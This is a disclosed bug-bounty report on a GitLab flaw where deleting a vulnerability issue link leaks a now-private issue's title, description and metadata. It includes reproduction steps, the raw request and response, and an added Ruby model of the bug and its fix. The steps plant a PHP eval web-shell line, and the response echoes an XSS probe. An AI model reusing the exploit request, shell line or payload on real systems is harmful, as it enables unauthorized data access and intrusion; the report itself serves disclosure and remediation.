Ability to access a previously accessible issue

HackerOne report #1179733 by wi11 on 2021-04-29, assigned to @ankelly:

Report

Summary

Hi team,

At GitLab, you can link to an existing issue for a vulnerability, and the issues can be linked across groups and projects.
A user can't link an issue that he can't access. But a user can delete an issue link he created before, and the related information about the issue is returned when deleting it. So if an issue link was created by a user and the visibility level of that issue is later changed, the user can still delete the issue link to get information about the issue he can no longer access.

Request

DELETE /api/v4/vulnerabilities/7989487/issue_links/9274 HTTP/1.1  
Host: gitlab.com  
Steps to reproduce

You need two accounts to reproduce this.

1. As the victim, create a public project -> create an issue.
2. As the attacker, you need to have a Vulnerability Report (if you already have one, jump to Step 4).
3. As the attacker -> create a project -> go to Security & Compliance -> Configuration -> enable SAST -> upload a PHP file with the code <?php eval($_POST['888']);?> to your repository -> wait for the pipeline to pass -> go to the Vulnerability Report.
4. Go to the Vulnerability Report -> link the issue that you created in Step 1 (paste the issue link).
5. Intercept the request -> remove the issue link; you will intercept a request like the one shown above. Send it to Repeater, and remember not to forward it, otherwise the link will be removed.
6. As the victim, change the project visibility to private and make some changes to the title and description of the issue created in Step 1.
7. As the attacker, send the request; you will find that the information of the issue is returned.

Impact

After an issue became inaccessible to the attacker, he can still retrieve information about the issue (title, description, state, assignees, etc.).

What is the current bug behavior?

When an issue link to a previously accessible issue was deleted, the information of the now-inaccessible issue was returned.

DELETE /api/v4/vulnerabilities/[REDACTED]/issue_links/9274 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Accept: application/json, text/plain, */*  
X-CSRF-Token:   
X-Requested-With: XMLHttpRequest  
Origin: https://gitlab.com  
Accept-Encoding: gzip, deflate  
Cookie: 
HTTP/1.1 200 OK  
Date: Thu, 29 Apr 2021 06:21:32 GMT  
Content-Type: application/json  
Connection: close  
Vary: Accept-Encoding  
Access-Control-Allow-Credentials: true  
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS  
Access-Control-Allow-Origin: https://gitlab.com  
Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page, X-Gitlab-Blob-Id, X-Gitlab-Commit-Id, X-Gitlab-Content-Sha256, X-Gitlab-Encoding, X-Gitlab-File-Name, X-Gitlab-File-Path, X-Gitlab-Last-Commit-Id, X-Gitlab-Ref, X-Gitlab-Size  
Access-Control-Max-Age: 7200  
Cache-Control: max-age=0, private, must-revalidate  
Etag: W/"23a17e185fb2cd10bfa81a06e6f25d84"  
Vary: Origin  
X-Content-Type-Options: nosniff  
X-Frame-Options: SAMEORIGIN  
X-Gitlab-Feature-Category: vulnerability_management  
X-Request-Id: 01F4E4M9NQCH1XTG95DP4NQGNJ  
X-Runtime: 0.237133  
Strict-Transport-Security: max-age=31536000  
Referrer-Policy: strict-origin-when-cross-origin  
RateLimit-Observed: 9  
RateLimit-Remaining: 1991  
RateLimit-Reset: 1619677352  
RateLimit-ResetTime: Thu, 29 Apr 2021 06:22:32 GMT  
RateLimit-Limit: 2000  
GitLab-LB: fe-09-lb-gprd  
GitLab-SV: localhost  
CF-Cache-Status: DYNAMIC  
cf-request-id: 09bde33e1e00001a5e7033d000000001  
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"  
Server: cloudflare  
CF-RAY: 64766e4368b11a5e-SIN  
Content-Length: 3692

{"id":9274,"vulnerability":{"id":7989487,"title":"Please do not use eval() functions","description":null,"state":"confirmed","severity":"high","confidence":"unknown","report_type":"sast","project":{"id":25475655,"description":"bug test bug test bug test  bug test !!!!!'\"\u003e\u003cimg src=zqzq onerror=alert(1)\u003e","name":"easy-money-maker","name_with_namespace":"ezgama / easy-money-maker","path":"a-project","path_with_namespace":"ezgama/a-project","created_at":"2021-03-28T06:36:35.788Z"},"finding":{"id":9486278,"created_at":"2021-04-06T08:16:39.241Z","updated_at":"2021-04-06T08:16:39.500Z","severity":"high","confidence":"unknown","report_type":"sast","project_id":25475655,"scanner_id":95603,"primary_identifier_id":2065399,"project_fingerprint":"b7b70a4e7acf2a02fd311dc34504a007f757bde4","location_fingerprint":"78df993d22174e7368adc689a1ed89fb927cbfbf","uuid":"6597da14-4b91-556d-b041-7d89d74fc1fb","name":"Please do not use eval() functions","metadata_version":"14.0.0","raw_metadata":"{\"id\":\"389d0a0ec7a6b2c2e6b8da2ab910aa123ee9bf462411c4de6c9bafe8e492ac7b\",\"category\":\"sast\",\"name\":\"Please do not use eval() functions\",\"message\":\"Please do not use eval() functions\",\"description\":\"Please do not use eval() functions\",\"cve\":\"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"severity\":\"High\",\"scanner\":{\"id\":\"phpcs_security_audit\",\"name\":\"phpcs-security-audit v2\"},\"location\":{\"file\":\"mama.php\",\"start_line\":1},\"identifiers\":[{\"type\":\"phpcs_security_audit_source\",\"name\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"value\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\"}],\"remediations\":[null]}","vulnerability_id":7989487,"details":{},"description":"Please do not use eval() functions","message":"Please do not use eval() functions","solution":null,"cve":"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals","location":{"file":"mama.php","start_line":1}},"resolved_on_default_branch":false,"project_default_branch":"master","author_id":8546086,"updated_by_id":null,"last_edited_by_id":null,"resolved_by_id":null,"dismissed_by_id":null,"confirmed_by_id":8546086,"start_date":null,"due_date":null,"created_at":"2021-04-06T08:16:39.453Z","updated_at":"2021-04-29T05:46:07.075Z","last_edited_at":null,"resolved_at":null,"dismissed_at":null,"confirmed_at":"2021-04-29T05:23:52.331Z"},"issue":{"id":86180604,"iid":16,"project_id":25969925,"title":"BUGSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS","description":"BUGBGUBGUBUGBUGBUGBUGSDDDDDDDDDDDDDDDDDDDDDDDDDD","state":"opened","created_at":"2021-04-29T05:57:17.615Z","updated_at":"2021-04-29T06:21:08.450Z","closed_at":null,"closed_by":null,"labels":[],"milestone":{"id":2023885,"iid":1,"group_id":11753634,"title":"group milestone","description":"","state":"active","created_at":"2021-04-29T05:10:02.829Z","updated_at":"2021-04-29T05:10:02.829Z","due_date":null,"start_date":null,"expired":null,"web_url":"https://gitlab.com/groups/dvadegroup/-/milestones/1"},"assignees":[],"author":{"id":8696838,"name":"dva dva","username":"dva_dva","state":"active","avatar_url":"https://assets.gitlab-static.net/uploads/-/system/user/avatar/8696838/avatar.png","web_url":"https://gitlab.com/dva_dva"},"assignee":null,"user_notes_count":0,"merge_requests_count":0,"upvotes":0,"downvotes":0,"due_date":"2021-08-20","confidential":true,"discussion_locked":null,"web_url":"https://gitlab.com/dvadegroup/dvadeproject/-/issues/16","time_stats":{"time_estimate":0,"total_time_spent":0,"human_time_estimate":null,"human_total_time_spent":null},"task_completion_status":{"count":0,"completed_count":0},"weight":100,"blocking_issues_count":0},"link_type":"related"}
What is the expected correct behavior?

The information of the inaccessible issue should not be returned.
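The authorization gap described above, modelled as an added example in Ruby (GitLab is a Rails application, but this is not GitLab's code; the Project, Issue, IssueLink and IssueLinkStore names and the handler functions are hypothetical stand-ins). The vulnerable handler authorizes deletion of the link (the caller is its author) and then serializes the linked issue straight from the stored association, so a permission that held when the link was created is trusted forever. The hardened handler re-checks, at request time, that the caller can currently read the issue before putting any of its fields in the response. The scenario replayed at the bottom follows the report: the attacker links a public issue, the victim makes the project private and edits the issue, the attacker deletes the link.

```ruby
# Added example, not GitLab's code. All class and method names are hypothetical.

Project = Struct.new(:id, :visibility, :members) do
  # Issues of a public project are readable by anyone; otherwise members only.
  def readable_by?(user)
    visibility == :public || members.include?(user)
  end
end

Issue = Struct.new(:id, :project, :title, :description, :confidential) do
  def readable_by?(user)
    return false unless project.readable_by?(user)
    # Confidential issues are readable only by project members.
    !confidential || project.members.include?(user)
  end

  def to_h
    { id: id, title: title, description: description }
  end
end

IssueLink = Struct.new(:id, :vulnerability_id, :issue, :author)

class IssueLinkStore
  def initialize
    @links = {}
  end

  def add(link)
    @links[link.id] = link
  end

  def find(id)
    @links[id]
  end

  def delete(id)
    @links.delete(id)
  end
end

# Vulnerable: only the *link* is authorized (its author may delete it); the
# linked issue is then serialized regardless of what the caller may read now.
def destroy_link_vulnerable(store, link_id, user)
  link = store.find(link_id)
  return { status: 404 } unless link
  return { status: 403 } unless link.author == user
  store.delete(link_id)
  { status: 200,
    body: { id: link.id, vulnerability_id: link.vulnerability_id, issue: link.issue.to_h } }
end

# Hardened: the issue is serialized only if the caller can read it at request
# time. The link id and vulnerability id are the caller's own input, so echoing
# them back reveals nothing new.
def destroy_link_hardened(store, link_id, user)
  link = store.find(link_id)
  return { status: 404 } unless link
  return { status: 403 } unless link.author == user
  store.delete(link_id)
  issue_body = link.issue.readable_by?(user) ? link.issue.to_h : nil
  { status: 200,
    body: { id: link.id, vulnerability_id: link.vulnerability_id, issue: issue_body } }
end

# Replays the report's sequence of events against a handler. Ids are taken
# from the report; the rest of the data is constructed for this example.
def replay_report(handler)
  attacker = :attacker
  victim = :victim
  project = Project.new(25969925, :public, [victim])
  issue = Issue.new(16, project, "original title", "original body", false)
  store = IssueLinkStore.new
  store.add(IssueLink.new(9274, 7989487, issue, attacker))

  # Victim flips the project to private and edits the issue after the link exists.
  project.visibility = :private
  issue.title = "secret title"
  issue.description = "secret body"

  handler.call(store, 9274, attacker)
end

if __FILE__ == $0
  p replay_report(method(:destroy_link_vulnerable))  # leaks "secret title"
  p replay_report(method(:destroy_link_hardened))    # issue: nil
end
```

A stricter variant answers 204 No Content with no body at all. Either way, the rule a reviewer should look for is that the serializer asks "can this user read the issue now?" rather than relying on the fact that the link could once be created; the same check also covers an issue that later became confidential.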

Output of checks

This bug happens on GitLab.com

Edited by Costel Maxim